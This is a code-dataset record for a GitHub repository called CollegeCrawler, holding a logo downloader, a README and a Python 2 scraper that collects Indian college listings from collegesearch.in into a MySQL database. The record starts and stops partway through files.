\"pygments_lexer\": \"r\",\n \"version\": \"3.4.1\"\n }\n}\n\nipynb = sys.argv[1]\n\nwith open(ipynb, 'r') as f:\n data = json.loads(f.read())\ndata['metadata'].update(rspec)\n\nwith open(ipynb, 'w') as f:\n f.write(json.dumps(data, indent=2))\n" } ]
3
Nikhil-Kr/CollegeCrawler
https://github.com/Nikhil-Kr/CollegeCrawler
e8d02dc2ed1088508514aead7ea12b130a027766
98e29edbb4968e2a3cb61dce9ac8f3c6eaf0c846
3ca06f901b9ebf9a054ecd23e42e40ed0c5ca26d
refs/heads/master
2021-01-01T03:50:39.412521
2016-05-19T15:52:22
2016-05-19T15:52:22
59,220,957
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.593647301197052, "alphanum_fraction": 0.6035049557685852, "avg_line_length": 27.45161247253418, "blob_id": "8dc075323d10e94f50683ca5dd5569fe92984975", "content_id": "0970697ea442469c3d90bf96f471a37ff6789bec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 913, "license_type": "no_license", "max_line_length": 59, "num_lines": 31, "path": "/logodownload.py", "repo_name": "Nikhil-Kr/CollegeCrawler", "src_encoding": "UTF-8", "text": "import MySQLdb\r\nimport urllib\r\n# Open database connection\r\ndb = MySQLdb.connect(\"127.0.0.1\",\"root\",\"\",\"cdcolleges\" )\r\n\r\n# prepare a cursor object using cursor() method\r\ncursor = db.cursor()\r\n\r\n# Prepare SQL query to INSERT a record into the database.\r\nsql =\"SELECT `CollegeId`,`CollegeLogo` FROM `collegelist`\";\r\ntry:\r\n # Execute the SQL command\r\n cursor.execute(sql)\r\n # Fetch all the rows in a list of lists.\r\n results = cursor.fetchall()\r\n for row in results:\r\n cid=row[0]\r\n clogo=row[1]\r\n clogo=clogo.replace('small','large')\r\n cid=cid+'_logo.jpg';\r\n resource = urllib.urlopen(clogo)\r\n output = open(cid,\"wb\")\r\n output.write(resource.read())\r\n output.close()\r\n #filename=clogo.split('/')[-1]\r\n #print filename\r\n #print \"cid=%s,clogo=%s\" % \\\r\n #(cid,clogo)\r\n #break\r\nexcept:\r\n print \"Error: unable to fecth data\"\r\n" }, { "alpha_fraction": 0.8470588326454163, "alphanum_fraction": 0.8470588326454163, "avg_line_length": 41.5, "blob_id": "c82299bb4aa797bfa403d6a45b281b2ce1df72a9", "content_id": "e96c079a63e0c849d35e20cf40d47864516d3ff7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 85, "license_type": "no_license", "max_line_length": 67, "num_lines": 2, "path": "/README.md", "repo_name": "Nikhil-Kr/CollegeCrawler", "src_encoding": "UTF-8", "text": "# CollegeCrawler\nA crawler for extracting information about various Indian Colleges.\n" }, { "alpha_fraction": 0.4123130142688751, "alphanum_fraction": 0.4252707362174988, "avg_line_length": 56.20147705078125, "blob_id": "9b0f1548c23f404d73cbef71403a7b6bf79b7185", "content_id": "ef73d9cba1ffd6caf9ca1933648cbb76c59d9c9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63025, "license_type": "no_license", "max_line_length": 792, "num_lines": 1082, "path": "/collegescraper.py", "repo_name": "Nikhil-Kr/CollegeCrawler", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\nfrom multiprocessing import Pool\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nrequests.packages.urllib3.disable_warnings()\r\nimport MySQLdb\r\nimport time\r\n\r\n#module for opening links where both redirects and certificate verification are disabled\r\ndef open_url(url):\r\n return requests.get(url,allow_redirects=False,verify=False)\r\n\r\n#module for opening links where certificate verification is disabled\r\ndef open_url1(url):\r\n return requests.get(url,verify=False)\r\n\r\ndef degree_short_filter(degree_short):\r\n degree_short=degree_short.replace(\"&nbsp;\",\"\")\r\n degree_short=degree_short.replace(\" \",\"\")\r\n return degree_short\r\n \r\n#module for filtering college type(public/private)\r\ndef filter_college_type(pubpvt):\r\n pubpvt = pubpvt.replace(\"'\",\"\")\r\n pubpvt = pubpvt.replace(\"Â\",\"\")\r\n pubpvt = pubpvt.replace(\"&nbsp;\",\"\")\r\n pubpvt= pubpvt.replace(\"|\",\"\")\r\n pubpvt=pubpvt.replace(\" \",\"\")\r\n pubpvt.rstrip()\r\n pubpvt.lstrip()\r\n return pubpvt\r\n \r\n#module for filtering college name\r\ndef filter_college_name(title):\r\n title = title.replace(\"'\",\"\")\r\n title = title.replace(\"’\",\"\")\r\n #title = title.replace(\"€™\",\"\")\r\n title = title.replace(\"Â\",\"\")\r\n title = title.replace(\" \",\"\")\r\n return title\r\n \r\n#module for filtering the college acronym/alias\r\ndef filter_alias(title1):\r\n title1 = title1.replace(\"’\",\"\")\r\n title1 = title1.replace(\"Â\",\"\")\r\n title1= title1.replace(\"'\",\"\")\r\n title1= title1.replace('\"','')\r\n title1= title1.replace(\" \",\"\")\r\n title1= title1.lstrip()\r\n title1= title1.rstrip()\r\n title1=title1.strip()\r\n return title1\r\n\r\n#module for getting the college key for matching with info from other sources after removing all the unnecessary things\r\ndef filter_content_for_college_key(string):\r\n string=string.replace(\"'\",\"\")\r\n string = string.replace(\" of \",\"\")\r\n string = string.replace(\" for \",\"\")\r\n string = string.replace(\" in \",\"\")\r\n string = string.replace(\".\",\"\")\r\n string = string.replace(\"'\",\"\")\r\n string = string.replace(\",\",\"\")\r\n string = string.replace(\";\",\"\")\r\n string = string.replace(\"&\",\"and\")\r\n string = string.replace(\"-\",\"\")\r\n string = string.replace(\" and \",\"\")\r\n string = string.replace(\" \",\"\")\r\n string = string.replace(\" \",\"\")\r\n string = string.lower()\r\n string = string.strip()\r\n string = string.lstrip()\r\n string = string.rstrip()\r\n regex1 = re.compile('\\(.+?\\)')\r\n string = regex1.sub('',string)\r\n return string\r\n\r\n#module for filtering the criteria for admission in college\r\ndef filter_criteria(criteria):\r\n criteria=criteria.replace(\"\\n\",\"\")\r\n criteria=criteria.replace(\" \",\"\")\r\n return criteria\r\n\r\n#module for filtering the procedure for admission in college\r\ndef filter_procedure(procedure):\r\n procedure=procedure.replace(\"Procedure\",\"\")\r\n procedure=procedure.replace(\"\\n\",\"\")\r\n return procedure\r\n\r\n#module for filtering the address of college\r\ndef filter_address(address):\r\n address=address.replace(\",\",\"\")\r\n address=address.replace(\" \",\"\")\r\n address=address.replace(\"\\n\",\"\")\r\n return address\r\n\r\n#module for filtering the recruiter list \r\ndef filter_recruiter(r):\r\n r=r.replace(\"'\",\"\")\r\n r=r.replace(\"\\n\",\"\")\r\n r=r.replace(\"\\r\",\"\")\r\n r=r.replace(\"\\r\\n\",\"\")\r\n return r\r\n\r\n#module for filtering the college fees\r\ndef filter_fees(fees):\r\n fees=fees.replace(\"Â\",\"\")\r\n fees=fees.replace(\"(Fees Break-up)\",\"\")\r\n fees=fees.replace(\" \",\"\")\r\n fees=fees.lstrip()\r\n fees=fees.rstrip()\r\n return fees\r\n\r\n#module for finding all the links on a given page\r\ndef find_all_links(page):\r\n return re.findall(' href=\"?([^\\s^\"]+)',page)\r\n\r\n#module for reading/fetching the page content of a particular url \r\ndef get_page_content(f):\r\n return f.text.encode(\"utf-8\")\r\n\r\n#module for parsing and getting plain text\r\ndef get_text(content):\r\n soup=BeautifulSoup(content)\r\n return soup.get_text().strip()\r\n\r\n#module for encoding the plain text \r\ndef encode(string):\r\n string=string.encode('utf-8')\r\n return string\r\n\r\n#module for removing non ascii characters\r\ndef removeNonAscii(s):\r\n return \"\".join(i for i in s if ord(i)<128)\r\n\r\nalias=[] #list to store the college acronym/alias\r\nrecruit=[] #list to store the distinct recruiter names\r\nbranchlist=[] #list to store the distinct branch names \r\ncoursefees=[] #list for storing the course fees\r\ncollegeestd=[] #list for storing the estd of college \r\ncollegetype=[] #list for storing the type of college(pub/pvt)\r\ncollegelogo=[] #list for storing the college logo\r\ncollegename=[] #list for storing the college names\r\ncollegename1=[] #list for storing the college names(after filtering) to match with the other sources\r\ncollegeaddress=[] #list for storing the college address\r\ncollegecriteria=[] #list for storing the criteria for admission into college\r\ncollegeprocedure=[] #list for storing the procedure for admission into college\r\ncollegerecruiters=[] #list for storing the college recruiters\r\ncollegesource=[] #list to store the info of the source from where all the data is being picked up\r\nbranchlistfinal=[] #list for storing all the branches(list of list of branches of individual colleges)\r\ncid=[] #list to store the distinct id of each college \r\ncid1=[] #list to store the distinct id of each course\r\ndid=[] #list to store the distinct id of each degree\r\nbid=[] #list to store the distinct id of each branch\r\nrid=[] #list to store the distinct id of each recruiter\r\ndegreelist=[]#to store the list of all degrees offered(abbreviation)\r\ndegreelistfull=[]#list to store the list of all degrees offered(full name)\r\ndegreelinks=[]#list to store the links\r\ncourselist=[] #list to store the list of all courses\r\ncollegewebsite=[] #list to store the college website\r\ncollegeemail=[] #list to store the college email\r\ncollegephone=[] #list to store the college phone number\r\ncollegedegree=[] #list to store the degree offered by the college\r\n\r\nsource=open_url('https://www.collegesearch.in/colleges') #the main url from which we'll fetch our data\r\ncontent=get_page_content(source)\r\ncontent1=content.split('<h3 class=\"visible-xs bold\" style=\"margin: 10px 0px;\">SELECT A COURSE </h3>')\r\ncontent2=content1[1].split('<script>')\r\ncontent3=content2[0].split('<div class=\"panel panel-default pop_exam\">')\r\ncontent4=content2[0].split('<div class=\"media-body pd-left10\">')\r\ndel content4[0]\r\ndel content3[0]\r\n\r\nfor c4 in content4:\r\n c4=c4.split('</h4>')\r\n course=get_text(c4[0])\r\n course=encode(course)\r\n courselist.append(course) #finding the list of all courses\r\n\r\n#print courselist\r\nlength1=len(courselist) #finding the length of the course list\r\n\r\ndb=MySQLdb.connect('127.0.0.1','root','','cdcolleges') #establishing the connection with the db(cdcolleges)\r\ncursor=db.cursor()\r\n \r\n#loop for entering the course list along with distinct course id into it's desired table(courselist) in the db\r\nfor cour1 in range(0,length1):\r\n sql=\"INSERT INTO `courselist`(`CourseId`, `CourseName`)VALUES('%s','%s')\"%('C'+str(cour1+1),courselist[cour1])\r\n ckey='C'+str(cour1+1)\r\n cid1.append(ckey)\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\n #print sql1\r\n\r\nfor deg in content3:\r\n deg=deg.split('<div class=\"media-body\">')\r\n name=deg[1].split('</div>')\r\n name1=name[0].split('</span>')\r\n name2=name1[0].split('<span class=\"badge\" style=\"background: #grey;\">')\r\n degree_short=get_text(name2[0])\r\n degree_short=degree_short_filter(degree_short)\r\n degree_long=get_text(name1[1])\r\n links=find_all_links(deg[0])\r\n degreelinks.append(links)\r\n degreelist.append(degree_short)#list of degrees(short names)\r\n degreelistfull.append(degree_long)#list of full degree names\r\n\r\ndel degreelist[8]\r\ndel degreelistfull[8]\r\ndel degreelinks[8]\r\n\r\nlength2=len(degreelist) #finding the length of the degree list\r\n\r\n#loop for entering the degree list along with distinct degree id into it's desired table(degree list) in the db\r\nfor deg1 in range(0,length2):\r\n sql=\"INSERT INTO `degreelist`(`DegreeId`, `DegreeName`,`FullDegreeName`)VALUES('%s','%s','%s')\"%('D'+str(deg1+1),degreelist[deg1],degreelistfull[deg1])\r\n dkey='D'+str(deg1+1)\r\n did.append(dkey)\r\n try:\r\n cursor.execute(sql)\r\n # Commit your changes in the database\r\n db.commit()\r\n except:\r\n # Rollback in case there is any error\r\n db.rollback()\r\n #print sql1\r\n\r\ndb.close()#closing the connection to the database(cdcolleges)\r\n\r\nc=0 #counter for various course id's\r\nr1=0 #counter for various recruiter id's\r\nb1=0 #counter for various branch id's\r\nc1=0 #counter for various degree id's\r\n\r\n#print did\r\n#print degreelinks\r\n#print len(degreelinks)\r\n#print degreelist\r\n#print degreelistfull\r\n\r\nlinklistfull=[] #list for all the links to crawl\r\n#mapping between course key,degree key and course name\r\nmapping=[['C1','D1','B.Tech/B.E.'],['C1','D2','PolytechnicCourse'],['C2','D3','BBA/BBM/BBS'],['C3','D4','MBBS'],['C3','D5','BDS'],['C3','D6','BPT'],['C3','D7','B.H.M.S'],['C3','D8','B.A.M.S'],['C4','D9','B.Arch'],['C4','D10','Architecture-Diploma'],['C5','D11','BCom'],['C6','D12','BSc'],['C7','D13','BA'],['C7','D14','B.F.A'],['C7','D15','FineArts-Diploma'],['C8','D16','BEd'],['C9','D17','B.Pharm'],['C10','D18','LLB'],['C10','D19','BA.LLB'],['C11','D20','BCA'],['C12','D21','BHM'],['C12','D22','DiplomainHotelManagement,Catering&Tourism'],['C12','D23','HotelManagement-Diploma'],['C13','D24','Media-UG'],['C13','D25','Mass-Communication'],['C13','D26','Media-Diploma'],['C14','D27','FashionDesign-UG'],['C14','D28','Design'],['C14','D29','DiplomainFashion'],['C14','D30','Design-Diploma']]\r\n\r\n\r\nfor l in degreelinks:\r\n for m in l:\r\n linklistfull.append(m)\r\n#print linklistfull\r\n\r\ndef f(x):\r\n try:\r\n flink=requests.get(x,verify=False)\r\n return flink.text.encode(\"utf-8\")\r\n except:\r\n return None\r\n #return x*x\r\n\r\nif __name__ == '__main__':\r\n pool = Pool(processes=4) # start 4 worker processes\r\n #result = pool.apply_async(f, [10]) # evaluate \"f(10)\" asynchronously\r\n #print result.get(timeout=1) # prints \"100\" unless your computer is *very* slow\r\n p=pool.map(f,linklistfull)\r\n #print p\r\n nolinks=len(p)\r\n for i in range(0,nolinks):\r\n linkcontent=p[i]\r\n if linkcontent is not None:\r\n #print linkcontent\r\n try:\r\n linkcontent1=linkcontent.split('<div class=\"col-md-4 col-xs-8 col-sm-10 refine_search\">')\r\n linkcontent2=linkcontent1[1].split('</div>')\r\n linkcontent3=linkcontent2[0].split('<b>')\r\n linkcontent4=linkcontent3[1].split('</b>')\r\n linkcontent4[0]=linkcontent4[0].replace(\",\",\"\")\r\n n=float(linkcontent4[0])/10\r\n #print n\r\n n1=int(n)\r\n n2=n-n1\r\n if n2>0.0:\r\n total=int(n)+1\r\n else:\r\n total=int(n)\r\n print total #getting the total no.of pages to be crawled for each url\r\n #print linklistfull[i]\r\n\r\n links1=[] #list to crawl all the url's to crawl acc to no of pages\r\n\r\n for foo in range(0,total): #now modifying the url to crawl the desired no.of pages\r\n links1.append(linklistfull[i]+\"?page=\"+str(foo+1))\r\n\r\n #print links1\r\n openlink=[]\r\n openlink=pool.map(f,links1)#opening all the links at once\r\n n4=len(openlink)\r\n print n4\r\n \r\n for i2 in range(0,n4):\r\n #print \"Crawling page:\\n\"+m1\r\n #f1=open_url(m1)\r\n #print openlink[i2]\r\n content66 = openlink[i2]\r\n content77= content66.split('<div class=\"col-md-9 col-xs-12 col-sm-12 paddingLeft_zero search_snippet\">')\r\n content88= content77[1].split('</form>')\r\n content99= content88[0].split('<div class=\"search_result_div paddingLeft_zero paddingRight_zero\">')\r\n del content99[0]\r\n for stuff in content99:\r\n copy=stuff\r\n\r\n #finding the college logo\r\n try:\r\n copy=copy.split('<div class=\"col-md-1 col-xs-2 college_logo\">')\r\n logo=copy[1].split('</a>')\r\n logo_college=re.findall(r'src=\"(.*?)\"',logo[0])\r\n if logo_college:\r\n for m in logo_college:\r\n collegelogo.append(m.encode('utf-8'))\r\n print m\r\n else:\r\n collegelogo.append(\"No link for logo provided\")\r\n print \"No logo found\"\r\n #print logo_college\r\n except:\r\n collegelogo.append(\"No link for logo provided\")\r\n print \"No logo found\"\r\n\r\n copy=stuff\r\n \r\n #finding the collegename\r\n try:\r\n copy=copy.split('<h3 class=\"college_name\">')\r\n name_link=copy[1].split('</a>')\r\n title=get_text(name_link[0])\r\n title=encode(title)\r\n title=filter_college_name(title)\r\n #title=title.decode(\"utf-8\")\r\n title=title.replace(\"'\",\"\")\r\n title=title.replace('\"',\"\")\r\n title=removeNonAscii(title)\r\n if title:\r\n collegename.append(title)\r\n print title\r\n else:\r\n print \"No college name found\"\r\n collegename.append(\"No title provided\")\r\n except Exception,e:\r\n print str(e)\r\n collegename.append(\"No title provided\")\r\n print \"No college name found\"\r\n\r\n copy=stuff\r\n\r\n #find the acronym/alias for college if any\r\n try:\r\n copy=copy.split('<h3 class=\"college_name\">')\r\n name_link=copy[1].split('</a>')\r\n title1=get_text(name_link[0])\r\n #print title1\r\n title1 = encode(title1)\r\n #print title1\r\n title1 = filter_alias(title1)\r\n m=re.search('\\((.*?)\\)',title1).group(1)\r\n m=filter_alias(m)\r\n if m:\r\n print m\r\n alias.append(m)\r\n else:\r\n print \"No alias found\"\r\n alias.append(\"No alias found\")\r\n except:\r\n alias.append(\"No alias found\")\r\n print(\"No alias found[except]\")\r\n \r\n copy=stuff \r\n\r\n #setting the collegekey for matching with other tables if the exist after removing all the unnecessary characters \r\n try:\r\n copy=copy.split('<h3 class=\"college_name\">')\r\n name_link=copy[1].split('</a>')\r\n title2=get_text(name_link[0])\r\n title2=encode(title2)\r\n title2 = filter_content_for_college_key(title2)\r\n title2 = title2.replace(\",\",\"\")\r\n title2=removeNonAscii(title2)\r\n regex1 = re.compile('\\(.+?\\)')\r\n output1 = regex1.sub('',title2)\r\n #output1 = output1.decode(\"utf-8\")\r\n #print output1\r\n if output1:\r\n collegename1.append(output1)\r\n print output1\r\n else:\r\n collegename1.append(\"No filtered title found\")\r\n print(\"No filtered title found\")\r\n #print logo\r\n except:\r\n collegename1.append(\"No filtered title found\")\r\n print(\"No filtered title provided[except]\")\r\n \r\n\r\n copy=stuff\r\n \r\n #finding the college degree from homepage for matching it with the content page\r\n try:\r\n copy=copy.split('<p class=\"degree\">')\r\n degree=copy[1].split('</p>')\r\n degree1=degree[0]\r\n '''if :\r\n print output2\r\n collegedegree.append(output2)\r\n else:\r\n print \"No degree specified\"\r\n collegedegree.append(\"NULL\")'''\r\n except:\r\n degree1=\"NULL\"\r\n #collegedegree.append(\"NULL\")\r\n #print \"No degree specified\"\r\n\r\n copy=stuff\r\n \r\n #finding the feess for the college\r\n try:\r\n copy=copy.split('<div class=\"col-md-6 col-xs-6 fees_details\">')\r\n fees=copy[1].split('</div>')\r\n fees1=get_text(fees[0])\r\n fees1 = encode(fees1)\r\n fees1=filter_fees(fees1)\r\n if fees1:\r\n print fees1\r\n coursefees.append(fees1)\r\n else:\r\n print \"No feees\"\r\n coursefees.append(\"No fees available\")\r\n #print fees1\r\n except Exception,e:\r\n print str(e)\r\n coursefees.append(\"No fees available\")\r\n print \"No feees\"\r\n\r\n copy=stuff\r\n cid.append('CLG'+str(c1+1)) #setting the college key\r\n print 'CLG'+str(c1+1)\r\n collegesource.append('https://www.collegesearch.in/') #storing the source\r\n collegedegree.append(degreelist[c]) #list of the college degree\r\n print degreelist[c]\r\n \r\n #now traversing all the college pages for extra information like recruiters,branches etc.\r\n try:\r\n copy=copy.split('<h3 class=\"college_name\">')\r\n college_link=copy[1].split('</a>')\r\n links = find_all_links(college_link[0])\r\n for m in links:\r\n try:\r\n f2=open_url1(m)\r\n innercontent = get_page_content(f2)\r\n innercontent44=innercontent.split('<p class=\"mg-0\" style=\"white-space: pre-line; line-height: 0.8em;\">')\r\n innercontent55=innercontent44[1].split('</strong>')\r\n degkey=get_text(innercontent55[0])\r\n if(degkey==degree1): #if the degree mentioned in the home page of college matches the degree mentioned in the content page\r\n\r\n\r\n stuff1=innercontent\r\n #finding the criteria for admission\r\n try:\r\n innercontent1 = stuff1.split('<span class=\"font11\">EXAMS ACCEPTED</span>')\r\n exam=innercontent1[1].split('</div>')\r\n exam1=get_text(exam[0])\r\n exam1=encode(exam1)\r\n exam1=filter_criteria(exam1)\r\n exam1=exam1.replace(\"'\",\"\")\r\n exam1=exam1.replace('\"',\"\")\r\n if exam1:\r\n collegecriteria.append(exam1)\r\n print exam1\r\n else:\r\n collegecriteria.append(\"No criteria specified\")\r\n print \"No criteria found\"\r\n except:\r\n collegecriteria.append(\"No criteria specified\")\r\n print \"No criteria found\"\r\n \r\n stuff1=innercontent\r\n \r\n #finding the type of college public/private\r\n try:\r\n innercontent1 = stuff1.split('<h5 id=\"media-heading\" class=\"media-heading mg-0 bold\">')\r\n pubpvt=innercontent1[1].split('</h5>')\r\n pubpvt1=get_text(pubpvt[0])\r\n pubpvt1=encode(pubpvt1)\r\n pubpvt1=filter_college_type(pubpvt1)\r\n pubpvt1=removeNonAscii(pubpvt1)\r\n pubpvt1=pubpvt1.replace(\"'\",\"\")\r\n pubpvt1=pubpvt1.replace('\"',\"\")\r\n if pubpvt1:\r\n collegetype.append(pubpvt1)\r\n print pubpvt1\r\n else:\r\n collegetype.append(\"Not specified whether public or private\")\r\n print \"Not specified whether public or private\"\r\n except:\r\n collegetype.append(\"Not specified whether public or private\")\r\n print \"Not specified whether public or private\"\r\n \r\n stuff1=innercontent\r\n #finding the list of college recruiters\r\n try:\r\n innercontent1 = stuff1.split('<span class=\"font11\">RECRUITERS</span>')\r\n recruiter=innercontent1[1].split('<div class=\"clgWrapper animatable moveUp\">')\r\n #print recruiter[0]\r\n soup6=BeautifulSoup(recruiter[0])\r\n recruiters1=[]\r\n recruiters=[]\r\n for image in soup6.findAll(\"img\"):\r\n recruiters.append(image.get('alt').encode('utf-8'))\r\n for r in recruiters:\r\n r=filter_recruiter(r)\r\n if r:\r\n recruiters1.append(r)\r\n else:\r\n recruiters1.append([\"No recruiters specified\"])#recruiter list of each individual college\r\n if r not in recruit:\r\n rid.append('R'+str(r1+1))#For recruiter id\r\n recruit.append(r)#for distinct recruiters\r\n r1=r1+1\r\n else:\r\n continue\r\n collegerecruiters.append(recruiters1)#recruiter list for every college(list includes individual recruiter list of each college)\r\n except Exception,e:\r\n collegerecruiters.append([\"No recruiters specified\"])\r\n print str(e)+\"No recruiters specified[except]\"#entire list of recruiters if not found \r\n\r\n '''if recruiters:\r\n print recruiters\r\n else:\r\n print \"No recruiters specified\"\r\n except:\r\n print \"No recruiters specified\"'''\r\n stuff1=innercontent\r\n #finding the college address\r\n try:\r\n innercontent1 = stuff1.split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n address=innercontent1[1].split('</div>')\r\n address1=get_text(address[0])\r\n address1=encode(address1)\r\n address1=filter_address(address1)\r\n address1=removeNonAscii(address1)\r\n address1 = address1.replace(\"’\",\"\")\r\n address1 = address1.replace(\"'\",\"\")\r\n address1 =address1.replace(\"Â\",\"\")\r\n address1 =address1.replace(\",\",\"\")\r\n address1 =address1.replace(\"'\",\"\")\r\n address1 =address1.replace('\"',\"\")\r\n if address1:\r\n collegeaddress.append(address1)\r\n print address1\r\n else:\r\n collegeaddress.append(\"Address info not available\")\r\n print \"No address given\"\r\n except:\r\n collegeaddress.append(\"Address info not avaiable\")\r\n print \"No address given\"\r\n \r\n stuff1=innercontent\r\n #finding the college phone number\r\n try:\r\n innercontent1 = stuff1.split('<h4 class=\"heading-new\"><span>LOCATION & CONTACT INFO</span></h4>')\r\n contactdetails= innercontent1[1].split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n contactdetails1=contactdetails[0].split('<div style=\"padding:5px;\" class=\"col-xs-4 col-md-4\">')\r\n phone=get_text(contactdetails1[0])\r\n phone=encode(phone)\r\n phone=removeNonAscii(phone)\r\n if phone:\r\n collegephone.append(phone)\r\n print phone\r\n else:\r\n collegephone.append(\"Phone info not available\")\r\n print \"No contact details\"\r\n \r\n except:\r\n collegephone.append(\"Phone info not available\")\r\n print \"No contact details\"\r\n\r\n stuff1=innercontent\r\n #finding the college email address if it exists\r\n try:\r\n innercontent1 = stuff1.split('<h4 class=\"heading-new\"><span>LOCATION & CONTACT INFO</span></h4>')\r\n contactdetails= innercontent1[1].split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n contactdetails1=contactdetails[0].split('<div style=\"padding:5px;\" class=\"col-xs-4 col-md-4\">')\r\n email=get_text(contactdetails1[1])\r\n email=encode(email)\r\n email=removeNonAscii(email)\r\n if email:\r\n collegeemail.append(email)\r\n print email\r\n else:\r\n collegeemail.append(\"Email info not available\")\r\n print \"Email info not available\"\r\n \r\n except:\r\n collegeemail.append(\"Email info not available\")\r\n print \"Email info not available\"\r\n\r\n stuff1=innercontent\r\n #finding the official college website\r\n try:\r\n innercontent1 = stuff1.split('<h4 class=\"heading-new\"><span>LOCATION & CONTACT INFO</span></h4>')\r\n contactdetails= innercontent1[1].split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n contactdetails1=contactdetails[0].split('<div style=\"padding:5px;\" class=\"col-xs-4 col-md-4\">')\r\n website=get_text(contactdetails1[2])\r\n website=encode(website)\r\n website=removeNonAscii(website)\r\n if website:\r\n collegewebsite.append(website)\r\n print website\r\n else:\r\n collegewebsite.append(\"Website info not available\")\r\n print \"Website info not available\"\r\n \r\n \r\n except:\r\n collegewebsite.append(\"Website info not available\")\r\n \"Website info not available\"\r\n\r\n stuff1=innercontent\r\n \r\n #finding the college branches\r\n try:\r\n innercontent1 = stuff1.split('<th>STREAMS</th>')\r\n branches = innercontent1[1].split('</tbody>')\r\n branches1 = branches[0].split('<tr>')\r\n del branches1[0]\r\n branchlist1=[]\r\n for b in branches1:\r\n b=b.split('</td>')\r\n bname=get_text(b[0])\r\n bname=encode(bname)\r\n branchlist1.append(bname)\r\n #if branchlist:\r\n if bname not in branchlist:\r\n bid.append('B'+str(b1+1))#For branch id\r\n branchlist.append(bname)#for distinct branches\r\n b1=b1+1\r\n else:\r\n continue\r\n branchlistfinal.append(branchlist1) #print branchlist\r\n except Exception,e:\r\n branchlistfinal.append([\"Branch info not available\"])\r\n print str(e)+\"No branches specified[except]\"\r\n\r\n else: #if the degree mentioned in the home page of college doesn't match the degree mentioned in the content page\r\n innercontent11=innercontent.split('<div class=\"college-section-nav\">')\r\n innercontent22=innercontent11[1].split('</div')\r\n innercontent33=innercontent22[0].split('</a>')\r\n linkk=find_all_links(innercontent33[2])\r\n #using selenium to click on the required link\r\n for linkz in linkk:\r\n #f3=open_url1(linkz)\r\n driver = webdriver.Firefox()\r\n time.sleep(15)\r\n driver.get(linkz)\r\n mouse = webdriver.ActionChains(driver)\r\n value = degree1\r\n span_xpath = '//b[contains(text(), \"' + value + '\")]'\r\n span_element = driver.find_element_by_xpath(span_xpath)\r\n\r\n # Then you hover on span element by mouse and click on it:\r\n mouse.move_to_element(span_element).click().perform()\r\n time.sleep(15)\r\n innercontent3=driver.page_source\r\n driver.quit()\r\n\r\n\r\n #print innercontent\r\n stuff1=innercontent3\r\n #finding the criteria of admission into the college\r\n try:\r\n innercontent1 = stuff1.split('<span class=\"font11\">EXAMS ACCEPTED</span>')\r\n exam=innercontent1[1].split('</div>')\r\n exam1=get_text(exam[0])\r\n exam1=encode(exam1)\r\n exam1=filter_criteria(exam1)\r\n exam1=exam1.replace(\"'\",\"\")\r\n exam1=exam1.replace('\"',\"\")\r\n if exam1:\r\n collegecriteria.append(exam1)\r\n print exam1\r\n else:\r\n collegecriteria.append(\"No criteria specified\")\r\n print \"No criteria found\"\r\n except:\r\n collegecriteria.append(\"No criteria specified\")\r\n print \"No criteria found\"\r\n \r\n stuff1=innercontent3\r\n #finding the type of college whether public/private\r\n try:\r\n innercontent1 = stuff1.split('<h5 id=\"media-heading\" class=\"media-heading mg-0 bold\">')\r\n pubpvt=innercontent1[1].split('</h5>')\r\n pubpvt1=get_text(pubpvt[0])\r\n pubpvt1=encode(pubpvt1)\r\n pubpvt1=filter_college_type(pubpvt1)\r\n pubpvt1=removeNonAscii(pubpvt1)\r\n pubpvt1=pubpvt1.replace(\"'\",\"\")\r\n pubpvt1=pubpvt1.replace('\"',\"\")\r\n if pubpvt1:\r\n collegetype.append(pubpvt1)\r\n print pubpvt1\r\n else:\r\n collegetype.append(\"Not specified whether public or private\")\r\n print \"Not specified whether public or private\"\r\n except:\r\n collegetype.append(\"Not specified whether public or private\")\r\n print \"Not specified whether public or private\"\r\n \r\n stuff1=innercontent3\r\n #finding the college recruiters\r\n try:\r\n innercontent1 = stuff1.split('<span class=\"font11\">RECRUITERS</span>')\r\n recruiter=innercontent1[1].split('<div class=\"clgWrapper animatable moveUp\">')\r\n #print recruiter[0]\r\n soup6=BeautifulSoup(recruiter[0])\r\n recruiters1=[]\r\n recruiters=[]\r\n for image in soup6.findAll(\"img\"):\r\n recruiters.append(image.get('alt').encode('utf-8'))\r\n for r in recruiters:\r\n r=filter_recruiter(r)\r\n if r:\r\n recruiters1.append(r)\r\n else:\r\n recruiters1.append([\"No recruiters specified\"])#recruiter list of each individual college\r\n if r not in recruit:\r\n rid.append('R'+str(r1+1))#For recruiter id\r\n recruit.append(r)#for distinct recruiters\r\n r1=r1+1\r\n else:\r\n continue\r\n collegerecruiters.append(recruiters1)#recruiter list for every college(list includes individual recruiter list of each college)\r\n except Exception,e:\r\n collegerecruiters.append([\"No recruiters specified\"])\r\n print str(e)+\"No recruiters specified[except]\"#entire list of recruiters if not found \r\n\r\n '''if recruiters:\r\n print recruiters\r\n else:\r\n print \"No recruiters specified\"\r\n except:\r\n print \"No recruiters specified\"'''\r\n stuff1=innercontent3\r\n #finding the college address\r\n try:\r\n innercontent1 = stuff1.split('<div class=\"bold\" style=\"color:#777;\">Address</div>')\r\n address=innercontent1[1].split('</div>')\r\n address1=get_text(address[0])\r\n address1=encode(address1)\r\n address1=filter_address(address1)\r\n address1=removeNonAscii(address1)\r\n address1 = address1.replace(\"’\",\"\")\r\n address1 = address1.replace(\"'\",\"\")\r\n address1 =address1.replace(\"Â\",\"\")\r\n address1 =address1.replace(\",\",\"\")\r\n address1 =address1.replace(\"'\",\"\")\r\n address1 =address1.replace('\"',\"\")\r\n if address1:\r\n collegeaddress.append(address1)\r\n print address1\r\n else:\r\n collegeaddress.append(\"Address info not available\")\r\n print \"No address given\"\r\n 